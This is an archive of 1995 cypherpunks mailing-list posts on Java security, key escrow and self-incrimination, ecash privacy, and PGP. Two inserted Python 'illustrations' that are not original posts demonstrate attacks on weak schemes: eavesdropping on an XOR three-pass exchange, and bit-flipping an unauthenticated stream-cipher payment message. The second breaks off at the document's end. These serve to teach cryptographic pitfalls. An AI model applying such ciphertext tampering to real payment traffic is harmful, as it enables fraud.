		product in the way we control other purchased software
		we place into our environments.  The inability to restrict
		which programs from which sources are run on our machines
		is a fundamental element of control.
	- Their product has been proven to be insecure in the past.  Several
		examples of its insecurities have been demonstrated, and many
		more have been pointed out.  There is essentially no counter
		point made by the Java supporters against these known defects.

	It seems to me that the loss of control resulting from the
widespread introduction of Java would make it unacceptable to business. 
The use of Java as it exists today violates the policies of many
businesses, and if their policies are ignored or changed to permit this
to happen, it weakens the overall control structure of the organization.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Fri, 8 Dec 95 06:59:22 PST
To: cypherpunks@toad.com
Subject: Re: (Fwd) General release of Open Encryptor interface for PGP
Message-ID: <m0tO4HN-000V4hC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks Jeff, but aimnet.com is not an anonymous server.
It dropped me as an unknown user.

Thanks
Tim Cook, Mindsource(tm) Librarian.
"The World is a Database - Mindsource is the Search Engine."
______________________________________________________________
M I N D S O U R C E (TM) I N F O R M A T I O N   N E T W O R K 
Send a blank Email to:mindsource@memo.net for full information
Visit our W3 Site http://www.ultimate.org/mindsource/main.html 
D E S T I N E D   FOR   G L O B A L   D I S T R I B U T I O N!  
Concept:"The Greatest Untapped Resource is Human Resource(TM)" 
Mindsource is a Reg. Trademark  Copyright(c)1995 by Mindsource





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Date: Fri, 8 Dec 95 08:44:21 PST
To: tcmay@mail.got.net
Subject: Re:Internet Stocks
Message-ID: <199512081645.AA18510@sunstorm.corp.cirrus.com>
MIME-Version: 1.0
Content-Type: text/plain



Can this be made a regular feature on the list? It will be helpful to discuss how the Internet companies are doing in the stock market. 

Also it would be interesting to see if any startups have a strong product to
survive in the market

Thanks!

Ashfaq




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 8 Dec 95 06:11:45 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Escrow expectations
Message-ID: <199512081417.JAA03121@homeport.org>
MIME-Version: 1.0
Content-Type: text



	If there is no expectation of privacy when a key is escrowed
with Bob, or my company's attorneys, then would there be any
expectation of privacy under Clipper?  Perhaps this is a powerful
argument we should expect to have used against us...

	"Your honor, we argue that in escrowing his keys with the US
government, the defendant should have known his communications could
be listened to, and thus has no expectation of privacy."


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 8 Dec 95 06:33:20 PST
To: cypherpunks@toad.com
Subject: Java musings
In-Reply-To: <9512081153.AA07233@all.net>
Message-ID: <m0tO3sm-000G9UC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Frederick B. Cohen writes:

 > 	- They won't back up their claims of security by assuming liability
 > 		for resulting damages.  Their liability disclaimers tell
 > 		us they think their security is worth exactly nothing.
 > 		They are asking us to bet control of our IT on a product
 > 		that they take no responsibility for.

You haven't paid for liability claims.  Why do you think you should be
able to pursue them?  I don't know of *any* software which is
guaranteed.  But now you have the opportunity to change that.  Point
out all of Java's problems, and then sell them a solution that fixes
those problems.

 > 	- They don't even provide us with the ability to control their
 > 		product in the way we control other purchased software
 > 		we place into our environments.  The inability to restrict
 > 		which programs from which sources are run on our machines
 > 		is a fundamental element of control.

Again, sounds like something you could sell.  Sell an HTTP proxy that
only passes Java content if it's been signed by your company.  And, of
course, sell the matching signing service.

There are no problems, really, just business opportunities.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: john.ellis@wmcmail.wmc.ac.uk
Date: Fri, 8 Dec 95 01:49:53 PST
To: drcharpe@hamlet.uncg.edu>
Subject: Re: PGP
Message-ID: <9511088184.AA818445140@wmcmail.wmc.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


     Does anyone have the source code for PGP (DOS) not Unix,
     


______________________________ Reply Separator _________________________________
Subject: PGP
Author:  Daniel 'genius' Charpentier <drcharpe@hamlet.uncg.edu> at internet
Date:    06/12/95 18:29


-----BEGIN PGP SIGNED MESSAGE-----
     
     
     
   I've tried to find out the answers to my
questions myself but I haven't been very successful. 
Actually, I haven't been successful at all.  First of all,
I've been using PGP on my computer but when I tried to port it 
over to my unix account it didn't work.  I took the source code 
and tried to compile it using the unix g++ compiler but it gave 
me all of these errors.  Where can I find PGP that is already 
compiled for unix or at the very least will compile for unix? 
Secondly, if I create a program that makes using PGP more
user friendly can I let other people have it ( for FREE )? 
Lastly, what is considered overkill with cryptography?
I don't believe anything is.  My programs accept what the user 
inputs for how large prime numbers should be ( my public
key programs ) but I make them able to accept values that go 
up to 30720 bits ( I don't believe a number can ever be large 
enough ).  You can never be to safe...never.
     
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
     
-----END PGP SIGNATURE-----
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oliver Huf <ohuf@relay.sedat.de>
Date: Fri, 8 Dec 95 00:33:58 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <199512080313.TAA00782@ix2.ix.netcom.com>
Message-ID: <Pine.NXT.3.91.951208093359.27366F-100000@oe1>
MIME-Version: 1.0
Content-Type: text/plain



> or rational here.)  The issue is that, unless written very carefully,
> the crypto-less software is a "component of a cryptosystem",
> and therefore still requires permission to export.

Thanks for the hint.

Oli.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Dec 95 09:50:28 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: More FUD from First Virtual
Message-ID: <m0tO6o4-00091AC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:51 AM 12/8/95 -0500, you wrote:
>Excerpts from mail.limbo: 7-Dec-95 More FUD from First Virtual Douglas
>Barnes@communiti (1157*)
>
>I *am* skeptical about the extent to which anonymous cash *can* succeed,

What can stop it?  What should stop it?


>but in point of fact I'd like to help.  I think society will be better
>off if one of the payment options is truly anonymous.  I think that
>level of privacy will inevitably carry a high surcharge, however, for
>reasons that I keep pointing out and you keep ignoring.

Well, maybe I haven't been following those reasons, but I see little or no
reason privacy should "inevitably carry a high surcharge."  If the relevant
encryptions had to be carried out with a pencil and a piece of paper, that
claim would make sense, but remember, we've got MICROPROCESSORS on our side!

I agree, I suppose, that there are definitely entities (read: governments)
which would WANT to prevent the use of anonymous cash, but I view them more
of an obstacle to be removed than a permanent bar.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 8 Dec 95 02:12:41 PST
To: john.ellis@wmcmail.wmc.ac.uk
Subject: Re: PGP
In-Reply-To: <9511088184.AA818445140@wmcmail.wmc.ac.uk>
Message-ID: <E0tNznx-0007jy-00@bescot.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>      Does anyone have the source code for PGP (DOS) not Unix,

You should be able to use http://www.pgp.net/pgp/ or ftp:ftp.pgp.net to find what you need - DOS is under pc ...

                                                                  dos directory
                                      DOS
   [1]Up to pc

Jul  6 15:03  Zip File         [2]pg262uis.zip  521Kb
Jul  6 13:37  Zip File         [3]pg262uix.zip  228Kb
Nov  7  1994  Zip File         [4]pgp262.zip  276Kb
May  9  1995  Zip File         [5]pgp262i.zip  272Kb
May  9  1995  Zip File         [6]pgp262is.zip  568Kb
Jul 16 13:21  Zip File         [7]pgp262ix.zip  419Kb
Apr  4  1995  Zip File         [8]pgp262s.zip  643Kb
Oct 19  1994  Zip File         [9]pgp26i.zip  251Kb
Oct 19  1994  Zip File         [10]pgp26is.zip  603Kb
Sep 19  1994  Zip File         [11]pgp26uis.zip  510Kb
May 11  1995  Zip File         [12]pgpmnu20.zip  45Kb
Sep 19  1994  Zip File         [13]pgpshe32.zip  108Kb
Sep 19  1994  Zip File         [14]pgs099e.zip  65Kb





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Dec 95 07:29:40 PST
To: cypherpunks@toad.com
Subject: Re: Escrow expectations
Message-ID: <2.2b8.32.19951208153041.00687120@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 AM 12/8/95 -0500, Adam Shostack wrote:

>	"Your honor, we argue that in escrowing his keys with the US
>government, the defendant should have known his communications could
>be listened to, and thus has no expectation of privacy."

If Clipper were mandated you might be able to resist a prosecution for
"failure to file" keys or for double encrypting your transmissions if you
could prove that you were transmitting illegal messages or evidence of a
crime.  Just as those who possess illegal weapons are not required to
register them (self incrimination).  You have to be sure your traffic is
illegal though otherwise no protection.

DCF

"But if indecency is banned from the nets what will happen to the photos of
Clinton's face posted on www.whitehouse.gov?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Fri, 8 Dec 95 07:29:39 PST
To: cypherpunks@toad.com
Subject: Java musings
Message-ID: <199512081530.KAA26089@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



I was starting to feel as if Java was going to be everything the hype was
cracking it up to be.

Then I saw Micro$oft jump on the Java bandwagon.  Could Java already be dead?

:-)

Regards,

Mark Hittinger
Netcom/Dallas
bugs@freebsd.netcom.com
bugs@ritz.mordor.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 8 Dec 95 07:47:50 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <199512080554.AAA05788@opine.cs.umass.edu>
Message-ID: <Pine.BSF.3.91.951208104300.736A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Futplex wrote:

> Black Unicorn writes:
> > Yes.  I have seen holdings which indicate that information given to an 
> > employer, where there was no obvious expectation that it be kept 
> > confidential, estopped 4th amendment protections to its introduction when 
> > obtained without a warrant.
> [...and...]
> > Again, because of the nature of the relationship.  There is an 
> > expectation that a conversation with an attorney is one of the most 
> > private exchanges you can engage in.  As for rare exceptions, I'm not so 
> > sure I would term them rare.
> 
> What happens if I disclose a key to my employer's corporate law firm ?

The "key" here to the legal analysis is likely to be that the 
*employer's* law firm does not represent you and that the information 
disclosed is not privileged.  The law firm's duty is to represent the 
corporation, not you.  Certainly, such things as how you came to reveal 
it and what your position in the corporation could come into play, but in 
general, that firm is NOT your lawyer.


> Does that clearly lie one way or the other, or would it likely hinge upon 
> the conditions under which I came to reveal the key ?
> 
> -Futplex <futplex@pseudonym.com>

EBD

Not a lawyer on the Net, although I play one in real life.
********************************************************** 
Flame away! I get treated worse in person every day!! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Fri, 8 Dec 95 10:46:55 PST
To: cypherpunks@toad.com
Subject: The Elevator Problem
Message-ID: <199512081847.KAA25829@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


A group of us have been wrestling with a problem and I'd like to ask for some 
outside help.  We've come to call it the Elevator Problem.

Alice and Bob want to establish a secret in front of Eve.  In other words, 
they want to agree on a secret key in an elevator full of Eves.

We don't want the protocol to step on any existing patents (DH, HM, etc.).  
If the protocol takes numerous steps, that's OK because ultimately we'd like 
Alice's machine to contact Bob's, who could respond, and back and forth as 
often as needed.

We have also talked about a less than perfect solution IF we can establish 
mathematically what the confidence level and risk factor are.  Alice and Bob 
might agree that the value of the secret is such that they can live with a 
1 in n probability that Eve too has the secret.

Shamir's 3 step seems close but I'm afraid we've been doing the blackboard 
talks so long that we're missing the solution.  IF THERE EVEN IS ONE.

thanks in advance,


Jerry Whiting
jwhiting@azalea.com
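
[Added illustration, not part of the original post: a sketch of the Shamir three-pass exchange the message mentions, run once with modular exponentiation and once with XOR as the commutative "lock", showing that in the XOR case a purely passive Eve recovers the secret from the three messages she overhears. The modulus 2^521 - 1, the sample secret and all function names are assumptions of this example.]

```python
import secrets
from math import gcd

# Demo modulus (assumption of this example): the Mersenne prime 2^521 - 1.
P = 2**521 - 1


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def lock_pair(p: int = P):
    """Pick an exponent e coprime to p-1 and its inverse d mod p-1,
    so that (m^e)^d == m (mod p) for every m in 1..p-1."""
    while True:
        e = secrets.randbelow(p - 3) + 2          # 2 .. p-2
        if gcd(e, p - 1) == 1:
            return e, pow(e, -1, p - 1)


def three_pass_exp(secret: int, p: int = P):
    """Three passes with exponentiation locks.
    Returns (value Bob recovers, transcript Eve overhears)."""
    if not 1 < secret < p - 1:
        raise ValueError("secret must lie strictly between 1 and p-1")
    ea, da = lock_pair(p)                         # Alice's private lock/unlock
    eb, db = lock_pair(p)                         # Bob's private lock/unlock
    m1 = pow(secret, ea, p)                       # Alice -> Bob: Alice's lock on
    m2 = pow(m1, eb, p)                           # Bob -> Alice: both locks on
    m3 = pow(m2, da, p)                           # Alice -> Bob: only Bob's lock left
    return pow(m3, db, p), (m1, m2, m3)


def three_pass_xor(secret: bytes):
    """Same message flow, but each lock is XOR with a private one-time pad."""
    ka = secrets.token_bytes(len(secret))
    kb = secrets.token_bytes(len(secret))
    m1 = xor(secret, ka)                          # Alice -> Bob
    m2 = xor(m1, kb)                              # Bob -> Alice
    m3 = xor(m2, ka)                              # Alice -> Bob (= secret ^ kb)
    return xor(m3, kb), (m1, m2, m3)


def eve_xor_all(transcript):
    """Passive listener: m1 ^ m2 ^ m3 cancels both pads and leaves the secret."""
    m1, m2, m3 = transcript
    return xor(xor(m1, m2), m3)


if __name__ == "__main__":
    key = b"elevator session key"                 # constructed sample secret
    got, heard = three_pass_xor(key)
    print("XOR locks: Bob gets", got, "| Eve gets", eve_xor_all(heard))

    as_int = int.from_bytes(key, "big")
    got, heard = three_pass_exp(as_int)
    print("exp locks: Bob recovers secret:", got == as_int)
    # The exponentiation variant has no such linear shortcut, but it is
    # unauthenticated, and it fails if Eve can take discrete logs mod p:
    # log of m2 to base m1 is Bob's exponent.
```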





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgrp.com>
Date: Fri, 8 Dec 95 10:41:02 PST
To: cypherpunks@toad.com
Subject: Anyone know of a white paper on security?
Message-ID: <199512081938.LAA01395@vertex.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


    The question I'm seeking to answer is : 

What criteria should be used to determine whether a scripting language such as Java, LiveScript, etc. is secure?

There are obvious issues such as access to the file system but has anyone thought this all the way through and codified a white paper?

john.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 8 Dec 95 07:54:32 PST
To: cypherpunks@toad.com
Subject: Re: Escrow expectations
In-Reply-To: <2.2b8.32.19951208153041.00687120@panix.com>
Message-ID: <m0tO59L-000G9eC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell writes:
 > At 09:17 AM 12/8/95 -0500, Adam Shostack wrote:
 > 
 > >	"Your honor, we argue that in escrowing his keys with the US
 > >government, the defendant should have known his communications could
 > >be listened to, and thus has no expectation of privacy."
 > 
 > If Clipper were mandated you might be able to resist a prosecution for
 > "failure to file" keys or for double encrypting your transmissions if you
 > could prove that you were transmitting illegal messages or evidence of a
 > crime.  Just as those who possess illegal weapons are not required to
 > register them (self incrimination).  You have to be sure your traffic is
 > illegal though otherwise no protection.

To bring two cypherpunks threads together:

That SHIT should be FUCK no DAMN problem ANAL whatsoever in a few SEX
months.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Dec 95 09:34:26 PST
To: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Subject: Re:Internet Stocks
Message-ID: <acedb6d70c021004c1c9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 PM 12/8/95, Ashfaq Rasheed wrote:
>Can this be made a regular feature on the list? It will be helpful to
>discuss on the Internet companies are doing in the stock market.
>
>Also it would be interesting to see if any startups have a strong product to
>survive in the market

It won't be a regular feature by me, that's for sure! What others write is
of course up to them.

As I said in my message, I'd gotten some queries in e-mail, enough to
indicate justification for one public message summarizing a bunch of
points. Especially seeing as how these stocks have been very much in the
news this week, and have been discussed on the list.

But this is not "StockPunks," so I don't plan to comment unless something
important comes up. Investors (and speculators) are well-served by various
news sources, including the "Wall Street Journal," which also carries at
least one great article per day, and sometimes even two.

A bonus URL for you folks: http://www.ai.mit.edu/stocks.html

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 8 Dec 95 08:02:45 PST
To: sameer <cypherpunks@toad.com
Subject: Re: the X.9 Electronic Payments ANSI standard
In-Reply-To: <199512080630.WAA17998@infinity.c2.org>
Message-ID: <9512081603.AA02769@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>The chair of the working group seems interested
>in including anonymous token-based payment systems in the standard, "I
>see no reason, other than interest, for the group to avoid
>non-account-based payment systems, to complement the account-based
>payment systems that we are now in the process of standardizing."

I see a damn good reason. X.9 is meant to be fast tracking credit card
payment mechanisms. They are not meant to be going out solving every problem in 
the universe. They could attempt to standardise non account payment systems 
after they have done the problem they were given. 

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 8 Dec 95 11:04:24 PST
To: cypherpunks@toad.com
Subject: Re: More FUD from First Virtual
Message-ID: <v02120d01acee261ab478@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


[Remainder of Nat's largely inaccurate rant deleted]

> But basically, what your argument comes down to is that in
>the event of a catastrophe, users can be told they have to sacrifice
>their anonymity if they want to keep their cash.  As I have said all
>along, the basic tradeoff is between anonymity and risk limitation in
>the event of disaster recovery.

NB's errors and distortions are numerous, but for the sake of brevity
and topicality I've chosen this particular misconstruction of what
I've written as an exemplar.

In my proposed approach, users don't sacrifice one iota of privacy
when redeeming expired cash. When the user reveals blinding factors
on unspent cash, the bank gives the user new (blinded) cash in
exchange. No payer-payee relationship is revealed. This is the same
wrong argument you've made before. Try reading the (very short) note;
this point is made explicitly. I have no clue what Digicash is
actually doing in this regard, but one of their engineers alluded
to something along these lines at Crypto.

It is this systematic distortion of truth by at least two representatives
of First Virtual that has led to this (highly intermittent) "vendetta".
I try not to feed the energy creatures, but this particular creature
and his minions are literally running around the country, spewing their
lies whenever they get the chance. When they slam cryptography in the
banking community, you can be assured they don't mention their charity
work for Phil, or how they really want to see anonymous systems some day.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Dec 95 09:56:40 PST
To: cypherpunks@toad.com
Subject: GAK and Self-Incrimination?
Message-ID: <acedb98c0d0210046493@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell wrote:

>At 09:17 AM 12/8/95 -0500, Adam Shostack wrote:
>
>>       "Your honor, we argue that in escrowing his keys with the US
>>government, the defendant should have known his communications could
>>be listened to, and thus has no expectation of privacy."
>
>If Clipper were mandated you might be able to resist a prosecution for
>"failure to file" keys or for double encrypting your transmissions if you
>could prove that you were transmitting illegal messages or evidence of a
>crime.  Just as those who possess illegal weapons are not required to
>register them (self incrimination).  You have to be sure your traffic is
>illegal though otherwise no protection.

Though I'm usually not too interested in smart-ass, overly cute,
interpretations of legal loopholes--having been burned by the tax protestor
arguments that the tax system is invalid because of definitions of money or
that Ohio never entered the Union legally, or somesuch--this whole escrow
thing has got me thinking.

Given that GAK means one never knows if the government is listening, could
a person claim protection against self-incrimination as a reason to not use
GAK, and get away with it? (This is different from the phone system, which
may also be tapped. The analogy would be the same if the government forced
one to pick a telephone it could tap over one it could not, which so far
has not been the case, but which soon may be if switching systems which are
not compliant with Digital Telephony Act provisions are shut down.)

Consider this hypo: I send an encrypted message to a partner in crime
containing plans for future crimes and descriptions of past crimes. I don't
GAK the message. The government prosecutes me under the Anti-Terrorism and
Child Protection Act of 1997.

My defense? That GAKKing the message would be tantamount to incriminating
myself, which the Fifth Amendment protects me against.

(The government might claim that this "tantamount" conclusion is specious,
that only with a valid court order could they open my traffic. I would
claim that this is suspect, citing the secret court (FISA) provisions, the
possible back doors in GAK (64 bits known to be breakable, according to
Clint Brooks of the government), and the general confusion about whether
opening one message exposes past traffic to reading. I think my lawyers
could make a convincing case that GAK will mean my words may be read by the
government, via multiple options.)

Comments?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 8 Dec 95 11:50:12 PST
To: Mark Twain Ecash Support <daw@delhi.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512081948.LAA16066@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 12/8/95 -0600, Mark Twain Ecash Support wrote:
>DigiCash agrees that it is desirable to encrypt the payment request. The
>problem is how? You can't use the payor's public key, since the payor is
>anonymous to the payee. There are other, high overhead, protocols that might
>be used, but after taking MIM into account, securing the payment request
>from within Ecash while retaining acceptable latency is much harder to
>accomplish than one might think. 

Wouldn't a Diffie-Hellman key exchange work here?  Or is that too much overhead?


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 8 Dec 95 08:56:16 PST
To: cypherpunks@toad.com
Subject: BAR_tur
Message-ID: <199512081657.LAA09805@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-08-95. W$J:

   "Microsoft to Adopt Rival Tecnologies."

      Gates yawned, "its awakening a sleeping giant."

      "In a fight between a bear and an alligator, what
      determines the victor is the terrain," Andreesen
      shat. "What Microsoft just did is move onto our
      terrain."

      Ellison puked, "the Internet makes strange bedfellows."

      Schmidt shreiked, "Java moola."

   BAR_tur













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Twain Ecash Support <support@marktwain.com>
Date: Fri, 8 Dec 95 10:24:10 PST
To: daw@delhi.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512081825.MAA22557@admin.starnet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:17 PM 12/7/95 -0500, you wrote:

>Assume the attacker is not doing any traffic analysis.  The problem is
>that even then, the shop's identity (and product info, and payment amount,
>and bank ID, etc.) are still sent *in the clear* in the Digicash payment
>protocol.  Thus all those items can be correlated to the payee's identity:
>a complete loss of privacy for the shop.
>
>There's no need to send that payment info in the clear -- why not encrypt?

DigiCash agrees that it is desirable to encrypt the payment request. The
problem is how? You can't use the payor's public key, since the payor is
anonymous to the payee. There are other, high overhead, protocols that might
be used, but after taking MIM into account, securing the payment request
from within Ecash while retaining acceptable latency is much harder to
accomplish than one might think. 

The best solution at this time seems to be to use the already existing https
connection to transmit the payment request. The next version of Ecash will
offer this feature as an option to the user.




--Mark Twain Bank Ecash Support
  Ecash. The secure Internet payment system that protects your privacy.
  <http://www.marktwain.com/ecash.html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 8 Dec 95 13:37:32 PST
To: cypherpunks@toad.com
Subject: NSA flying disk follow-up [Extremely Frivolous]
Message-ID: <v02120d07acee50acb4f2@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I spoke with Dennis Cisco at the NSA today, and he is
unwilling to sell or otherwise distribute the NSA flying
disk promotional items "except at trade shows where we
are promoting our technology transfer program." Since they
are not planning on attending any such conferences in my
area in the near future, it is unlikely I'll be able to help
any of the (numerous) people who expressed an interest in
obtaining one of these fine flying disks.
(http://www.communities.com/foo/NSAfris.gif)

If you'd care to discuss this matter with Mr. Cisco yourself,
he can be reached at: (301) 688 0701. Note that this is in
Maryland. Also, the (301) 688 0606 number listed on the frisbee
seems to be either always busy or not answered -- I'm assuming
it's the # for the NSA tech transfer office.

Please let me know if any of you have better luck.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Kuchling <andrewk@dexotek.ca>
Date: Fri, 8 Dec 95 11:25:55 PST
To: cypherpunks@toad.com
Subject: Re: Python Cryptography Toolkit v1.0.0
In-Reply-To: <199512080747.CAA06243@opine.cs.umass.edu>
Message-ID: <9512081925.AA17370@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Futplex <futplex@pseudonym.com> wrote:
> (1) If you don't mind announcing that you've exported the software from
> Canada to the Netherlands, why not just put it up for ftp at a Canadian 
> site ?

	Simply because I don't have anywhere to put it.  This e-mail account
is at my workplace, and my employer doesn't run an anonymous FTP site.  I
also don't have an account with a local ISP, just because I haven't bothered
to get one yet.  Once I do, I'll certainly make the code available there.

> (2) Acronym overload: try to avoid calling your toolkit "PCT", since M$
> already has some security protocol called PCT....

	Yeah, I know; my code has been around for about 6 months, and I only
found out about MS's protocol a few weeks ago.  Hmmm... Python Cryptography
_Package_?  Kit?  Collection?  Stuff?  


	Andrew Kuchling 
	andrewk@cst.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 8 Dec 95 05:45:48 PST
To: David A Wagner <daw@guaymas.CS.Berkeley.EDU>
Subject: Re: Still more on the Digicash protocol
Message-ID: <Pine.3.89.9512081312.A23124-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, David A Wagner wrote:

>Tough!?  It's trivial for an active attacker, in the stream cipher case.
>He just xors some bits: no clever cryptanalysis needed.  (Or did you mean
>it's tough to mount an active attack?  I agree: that requires significant
>knowledge or motivation.)

Exactly.. once you have an active attack set up, it's trivial, but setting
that up is quite hard. 

	Mark
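
[Added illustration, not part of the original exchange: the stream-cipher point in the quoted remark, seen from the receiver's side. A ciphertext with some bits XORed in transit decrypts cleanly to a different message unless the receiver also checks a MAC over the ciphertext. The SHA-256 counter-mode keystream is a toy stand-in chosen for this example, the payment string is constructed, and all function names are this example's own.]

```python
import hashlib
import hmac
import secrets


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(key: bytes, n: int) -> bytes:
    """Toy stream cipher: SHA-256(key || counter) blocks (one message per key)."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(8, "big")).digest()
        ctr += 1
    return out[:n]


def encrypt(key: bytes, data: bytes) -> bytes:
    return xor(data, keystream(key, len(data)))


decrypt = encrypt  # XOR with the same keystream undoes itself


def seal(enc_key: bytes, mac_key: bytes, plaintext: bytes):
    """Encrypt-then-MAC: the tag covers the ciphertext."""
    ct = encrypt(enc_key, plaintext)
    return ct, hmac.new(mac_key, ct, hashlib.sha256).digest()


def open_sealed(enc_key: bytes, mac_key: bytes, ct: bytes, tag: bytes):
    """Return the plaintext, or None if the ciphertext was altered."""
    expected = hmac.new(mac_key, ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return decrypt(enc_key, ct)


def alter_in_transit(ct: bytes, offset: int, known: bytes, wanted: bytes) -> bytes:
    """Keyless modification: XOR (known ^ wanted) into the ciphertext."""
    delta = xor(known, wanted)
    end = offset + len(delta)
    return ct[:offset] + xor(ct[offset:end], delta) + ct[end:]


def demo():
    enc_key, mac_key = secrets.token_bytes(32), secrets.token_bytes(32)
    msg = b"shop=example;amount=0010.00"          # constructed sample
    ct, tag = seal(enc_key, mac_key, msg)
    altered = alter_in_transit(ct, msg.index(b"0010.00"), b"0010.00", b"9999.00")
    return {
        "no_mac": decrypt(enc_key, altered),                  # accepted silently
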